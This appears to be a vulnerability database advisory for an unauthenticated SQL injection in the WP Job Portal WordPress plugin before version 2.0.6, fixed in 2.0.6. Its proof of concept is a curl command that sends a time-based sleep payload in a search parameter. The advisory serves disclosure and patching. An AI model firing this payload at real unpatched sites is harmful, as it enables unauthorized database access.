WordPress Plugin Vulnerabilities

WP Job Portal < 2.0.6 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

Setup (as admin): Create a dummy company and a job (if there are none)

Attack (as unauthenticated):
time curl -X POST --data 'jobtitle=a&city=(select*from(select(sleep(10)))a)&wpjobportallay=jobs&WPJOBPORTAL_form_search=WPJOBPORTAL_SEARCH' https://example.com/wp-job-portal-jobseeker-controlpanel/jobs/

and notice the 10s delay of the response

Affects Plugins

Fixed in 2.0.6

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Pablo Sanchez
Submitter
Pablo Sanchez
Verified
Yes

Timeline

Publicly Published
2023-08-30 (about 8 months ago)
Added
2023-08-30 (about 8 months ago)
Last Updated
2023-10-18 (about 6 months ago)

Other